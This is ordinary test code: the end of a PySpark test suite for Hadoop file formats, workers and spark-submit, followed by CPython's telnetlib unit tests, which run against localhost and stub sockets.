self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
maps = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
em = [(u'\x01', []),
(u'\x01', [3.0]),
(u'\x02', [1.0]),
(u'\x02', [1.0]),
(u'\x03', [2.0])]
self.assertEqual(maps, em)
def test_binary_files(self):
path = os.path.join(self.tempdir.name, "binaryfiles")
os.mkdir(path)
data = "short binary data"
with open(os.path.join(path, "part-0000"), 'w') as f:
f.write(data)
[(p, d)] = self.sc.binaryFiles(path).collect()
self.assertTrue(p.endswith("part-0000"))
self.assertEqual(d, data)
def test_binary_records(self):
path = os.path.join(self.tempdir.name, "binaryrecords")
os.mkdir(path)
with open(os.path.join(path, "part-0000"), 'w') as f:
for i in range(100):
f.write('%04d' % i)
result = self.sc.binaryRecords(path, 4).map(int).collect()
self.assertEqual(range(100), result)
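# Editor's sketch (not part of the original tests): the fixed-width record pattern
# exercised by test_binary_records above, factored into a standalone helper. The
# record_length argument is an assumption and must match how the file was written.
def _demo_binary_records(sc, path, record_length=4):
    # Each record is a fixed-length byte string such as '0042'; decode it as an int.
    return sc.binaryRecords(path, record_length).map(int).collect()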
class OutputFormatTests(ReusedPySparkTestCase):
def setUp(self):
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
def tearDown(self):
shutil.rmtree(self.tempdir.name, ignore_errors=True)
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = sorted(self.sc.sequenceFile(basepath + "/sfmap/").collect())
self.assertEqual(maps, em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = sorted(self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect())
self.assertEqual(result, dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapred.output.dir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/olddataset/"}
old_dataset = sorted(self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect())
self.assertEqual(old_dataset, dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.Text",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
def test_newhadoop_with_array(self):
basepath = self.tempdir.name
# use custom ArrayWritable types and converters to handle arrays
array_data = [(1, array('d')),
(1, array('d', [1.0, 2.0, 3.0])),
(2, array('d', [3.0, 4.0, 5.0]))]
self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
self.assertEqual(result, array_data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
conf,
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
conf=input_conf).collect())
self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
def test_reserialization(self):
basepath = self.tempdir.name
x = range(1, 5)
y = range(1001, 1005)
data = zip(x, y)
rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
self.assertEqual(result1, data)
rdd.saveAsHadoopFile(
basepath + "/reserialize/hadoop",
"org.apache.hadoop.mapred.SequenceFileOutputFormat")
result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
self.assertEqual(result2, data)
rdd.saveAsNewAPIHadoopFile(
basepath + "/reserialize/newhadoop",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
self.assertEqual(result3, data)
conf4 = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/dataset"}
rdd.saveAsHadoopDataset(conf4)
result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
self.assertEqual(result4, data)
conf5 = {"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/newdataset"}
rdd.saveAsNewAPIHadoopDataset(conf5)
result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
self.assertEqual(result5, data)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class DaemonTests(unittest.TestCase):
def connect(self, port):
from socket import socket, AF_INET, SOCK_STREAM
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', port))
        # send a split index of -1 to shut down the worker
sock.send("\xFF\xFF\xFF\xFF")
sock.close()
return True
def do_termination_test(self, terminator):
from subprocess import Popen, PIPE
from errno import ECONNREFUSED
# start daemon
daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py")
daemon = Popen([sys.executable, daemon_path], stdin=PIPE, stdout=PIPE)
# read the port number
port = read_int(daemon.stdout)
# daemon should accept connections
self.assertTrue(self.connect(port))
# request shutdown
terminator(daemon)
time.sleep(1)
# daemon should no longer accept connections
try:
self.connect(port)
except EnvironmentError as exception:
self.assertEqual(exception.errno, ECONNREFUSED)
else:
self.fail("Expected EnvironmentError to be raised")
def test_termination_stdin(self):
"""Ensure that daemon and workers terminate when stdin is closed."""
self.do_termination_test(lambda daemon: daemon.stdin.close())
def test_termination_sigterm(self):
"""Ensure that daemon and workers terminate on SIGTERM."""
from signal import SIGTERM
self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
class WorkerTests(PySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
self.sc.parallelize(range(1)).foreach(sleep)
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
data = open(path).read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(range(100), 1)
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write("Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(range(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.isAlive())
self.assertEqual(100000, rdd.count())
class SparkSubmitTests(unittest.TestCase):
def setUp(self):
self.programDir = tempfile.mkdtemp()
self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
def tearDown(self):
shutil.rmtree(self.programDir)
def createTempFile(self, name, content):
"""
Create a temp file with the given name and content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
path = os.path.join(self.programDir, name)
with open(path, "w") as f:
f.write(content)
return path
def createFileInZip(self, name, content):
"""
Create a zip archive containing a file with the given content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
path = os.path.join(self.programDir, name + ".zip")
zip = zipfile.ZipFile(path, 'w')
zip.writestr(name, content)
zip.close()
return path
def test_single_script(self):
"""Submit and test a single script file"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect()
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out)
def test_script_with_local_functions(self):
"""Submit and test a single script file calling a global function"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 3
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(foo).collect()
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[3, 6, 9]", out)
def test_module_dependency(self):
"""Submit and test a script with a dependency on another module"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(myfunc).collect()
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out)
def test_module_dependency_on_cluster(self):
"""Submit and test a script with a dependency on another module on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(myfunc).collect()
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
"local-cluster[1,1,512]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out)
def test_single_script_on_cluster(self):
"""Submit and test a single script on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 2
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(foo).collect()
""")
# this will fail if you have different spark.executor.memory
# in conf/spark-defaults.conf
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,512]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out)
class ContextTests(unittest.TestCase):
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_progress_api(self):
with SparkContext() as sc:
sc.setJobGroup('test_progress_api', '', True)
rdd = sc.parallelize(range(10)).map(lambda x: time.sleep(100))
t = threading.Thread(target=rdd.collect)
t.daemon = True
t.start()
# wait for scheduler to start
time.sleep(1)
tracker = sc.statusTracker()
jobIds = tracker.getJobIdsForGroup('test_progress_api')
self.assertEqual(1, len(jobIds))
job = tracker.getJobInfo(jobIds[0])
self.assertEqual(1, len(job.stageIds))
stage = tracker.getStageInfo(job.stageIds[0])
self.assertEqual(rdd.getNumPartitions(), stage.numTasks)
sc.cancelAllJobs()
t.join()
# wait for event listener to update the status
time.sleep(1)
job = tracker.getJobInfo(jobIds[0])
self.assertEqual('FAILED', job.status)
self.assertEqual([], tracker.getActiveJobsIds())
self.assertEqual([], tracker.getActiveStageIds())
sc.stop()
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
"""General PySpark tests that depend on scipy """
def test_serialize(self):
from scipy.special import gammaln
x = range(1, 5)
expected = map(gammaln, x)
observed = self.sc.parallelize(x).map(gammaln).collect()
self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
"""General PySpark tests that depend on numpy """
def test_statcounter_array(self):
x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
s = x.stats()
self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())
if __name__ == "__main__":
if not _have_scipy:
print "NOTE: Skipping SciPy tests as it does not seem to be installed"
if not _have_numpy:
print "NOTE: Skipping NumPy tests as it does not seem to be installed"
unittest.main()
if not _have_scipy:
print "NOTE: SciPy tests were skipped as it does not seem to be installed"
if not _have_numpy:
print "NOTE: NumPy tests were skipped as it does not seem to be installed"
|
test_telnetlib.py
|
import socket
import selectors
import telnetlib
import threading
import contextlib
from test import support
from test.support import socket_helper
import unittest
support.requires_working_socket(module=True)
HOST = socket_helper.HOST
def server(evt, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
conn.close()
except TimeoutError:
pass
finally:
serv.close()
class GeneralTests(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(60)  # Safety net. See issue 11812
self.port = socket_helper.bind_port(self.sock)
self.thread = threading.Thread(target=server, args=(self.evt,self.sock))
self.thread.daemon = True
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
del self.thread # Clear out any dangling Thread objects.
def testBasic(self):
# connects
telnet = telnetlib.Telnet(HOST, self.port)
telnet.sock.close()
def testContextManager(self):
with telnetlib.Telnet(HOST, self.port) as tn:
self.assertIsNotNone(tn.get_socket())
self.assertIsNone(tn.get_socket())
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutNone(self):
        # an explicit timeout=None should override the non-None global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(telnet.sock.gettimeout() is None)
telnet.sock.close()
def testTimeoutValue(self):
telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutOpen(self):
telnet = telnetlib.Telnet()
telnet.open(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testGetters(self):
# Test telnet getter methods
telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
t_sock = telnet.sock
self.assertEqual(telnet.get_socket(), t_sock)
self.assertEqual(telnet.fileno(), t_sock.fileno())
telnet.sock.close()
class SocketStub(object):
''' a socket proxy that re-defines sendall() '''
def __init__(self, reads=()):
self.reads = list(reads) # Intentionally make a copy.
self.writes = []
self.block = False
def sendall(self, data):
self.writes.append(data)
def recv(self, size):
out = b''
while self.reads and len(out) < size:
out += self.reads.pop(0)
if len(out) > size:
self.reads.insert(0, out[size:])
out = out[:size]
return out
class TelnetAlike(telnetlib.Telnet):
def fileno(self):
raise NotImplementedError()
def close(self): pass
def sock_avail(self):
return (not self.sock.block)
def msg(self, msg, *args):
with support.captured_stdout() as out:
telnetlib.Telnet.msg(self, msg, *args)
self._messages += out.getvalue()
return
class MockSelector(selectors.BaseSelector):
def __init__(self):
self.keys = {}
@property
def resolution(self):
return 1e-3
def register(self, fileobj, events, data=None):
key = selectors.SelectorKey(fileobj, 0, events, data)
self.keys[fileobj] = key
return key
def unregister(self, fileobj):
return self.keys.pop(fileobj)
def select(self, timeout=None):
block = False
for fileobj in self.keys:
if isinstance(fileobj, TelnetAlike):
block = fileobj.sock.block
break
if block:
return []
else:
return [(key, key.events) for key in self.keys.values()]
def get_map(self):
return self.keys
@contextlib.contextmanager
def test_socket(reads):
def new_conn(*ignored):
return SocketStub(reads)
try:
old_conn = socket.create_connection
socket.create_connection = new_conn
yield None
finally:
socket.create_connection = old_conn
return
def test_telnet(reads=(), cls=TelnetAlike):
''' return a telnetlib.Telnet object that uses a SocketStub with
reads queued up to be read '''
for x in reads:
assert type(x) is bytes, x
with test_socket(reads):
telnet = cls('dummy', 0)
telnet._messages = '' # debuglevel output
return telnet
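# Editor's sketch (not part of the original suite): a standalone illustration of the
# stub harness above -- queue raw bytes on the SocketStub via test_telnet(), then
# drive telnetlib against it without touching a real network connection.
def _demo_stub_read():
    telnet = test_telnet([b'hello ', b'world'])
    # read_all() drains the queued reads until the stub reports EOF.
    assert telnet.read_all() == b'hello world'
    return telnet.sock.writes  # nothing was written in this demo, so this is []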
class ExpectAndReadTestCase(unittest.TestCase):
def setUp(self):
self.old_selector = telnetlib._TelnetSelector
telnetlib._TelnetSelector = MockSelector
def tearDown(self):
telnetlib._TelnetSelector = self.old_selector
class ReadTests(ExpectAndReadTestCase):
def test_read_until(self):
"""
read_until(expected, timeout=None)
        Test the blocking version of read_until.
"""
want = [b'xxxmatchyyy']
telnet = test_telnet(want)
data = telnet.read_until(b'match')
self.assertEqual(data, b'xxxmatch', msg=(telnet.cookedq, telnet.rawq, telnet.sock.reads))
reads = [b'x' * 50, b'match', b'y' * 50]
expect = b''.join(reads[:-1])
telnet = test_telnet(reads)
data = telnet.read_until(b'match')
self.assertEqual(data, expect)
def test_read_all(self):
"""
read_all()
Read all data until EOF; may block.
"""
reads = [b'x' * 500, b'y' * 500, b'z' * 500]
expect = b''.join(reads)
telnet = test_telnet(reads)
data = telnet.read_all()
self.assertEqual(data, expect)
return
def test_read_some(self):
"""
read_some()
Read at least one byte or EOF; may block.
"""
# test 'at least one byte'
telnet = test_telnet([b'x' * 500])
data = telnet.read_some()
self.assertTrue(len(data) >= 1)
# test EOF
telnet = test_telnet()
data = telnet.read_some()
self.assertEqual(b'', data)
def _read_eager(self, func_name):
"""
read_*_eager()
Read all data available already queued or on the socket,
without blocking.
"""
want = b'x' * 100
telnet = test_telnet([want])
func = getattr(telnet, func_name)
telnet.sock.block = True
self.assertEqual(b'', func())
telnet.sock.block = False
data = b''
while True:
try:
data += func()
except EOFError:
break
self.assertEqual(data, want)
def test_read_eager(self):
# read_eager and read_very_eager make the same guarantees
# (they behave differently but we only test the guarantees)
self._read_eager('read_eager')
self._read_eager('read_very_eager')
# NB -- we need to test the IAC block which is mentioned in the
# docstring but not in the module docs
    def test_read_very_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_very_lazy())
while telnet.sock.reads:
telnet.fill_rawq()
data = telnet.read_very_lazy()
self.assertEqual(want, data)
self.assertRaises(EOFError, telnet.read_very_lazy)
def test_read_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_lazy())
data = b''
while True:
try:
read_data = telnet.read_lazy()
data += read_data
if not read_data:
telnet.fill_rawq()
except EOFError:
break
self.assertTrue(want.startswith(data))
self.assertEqual(data, want)
class nego_collector(object):
def __init__(self, sb_getter=None):
self.seen = b''
self.sb_getter = sb_getter
self.sb_seen = b''
def do_nego(self, sock, cmd, opt):
self.seen += cmd + opt
if cmd == tl.SE and self.sb_getter:
sb_data = self.sb_getter()
self.sb_seen += sb_data
tl = telnetlib
class WriteTests(unittest.TestCase):
'''The only thing that write does is replace each tl.IAC for
tl.IAC+tl.IAC'''
def test_write(self):
data_sample = [b'data sample without IAC',
b'data sample with' + tl.IAC + b' one IAC',
b'a few' + tl.IAC + tl.IAC + b' iacs' + tl.IAC,
tl.IAC,
b'']
for data in data_sample:
telnet = test_telnet()
telnet.write(data)
written = b''.join(telnet.sock.writes)
self.assertEqual(data.replace(tl.IAC,tl.IAC+tl.IAC), written)
class OptionTests(unittest.TestCase):
# RFC 854 commands
cmds = [tl.AO, tl.AYT, tl.BRK, tl.EC, tl.EL, tl.GA, tl.IP, tl.NOP]
def _test_command(self, data):
""" helper for testing IAC + cmd """
telnet = test_telnet(data)
data_len = len(b''.join(data))
nego = nego_collector()
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
cmd = nego.seen
self.assertTrue(len(cmd) > 0) # we expect at least one command
self.assertIn(cmd[:1], self.cmds)
self.assertEqual(cmd[1:2], tl.NOOPT)
self.assertEqual(data_len, len(txt + cmd))
nego.sb_getter = None # break the nego => telnet cycle
def test_IAC_commands(self):
for cmd in self.cmds:
self._test_command([tl.IAC, cmd])
self._test_command([b'x' * 100, tl.IAC, cmd, b'y'*100])
self._test_command([b'x' * 10, tl.IAC, cmd, b'y'*10])
# all at once
self._test_command([tl.IAC + cmd for (cmd) in self.cmds])
def test_SB_commands(self):
# RFC 855, subnegotiations portion
send = [tl.IAC + tl.SB + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + b'aa' + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'bb' + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'cc' + tl.IAC + tl.IAC + b'dd' + tl.IAC + tl.SE,
]
telnet = test_telnet(send)
